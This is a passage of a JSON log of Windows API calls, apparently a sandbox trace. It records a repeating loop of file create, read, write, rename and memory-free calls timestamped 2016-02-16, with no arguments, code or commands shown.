"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:57,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:57,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:57,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,685", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,695", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:57,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,735", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 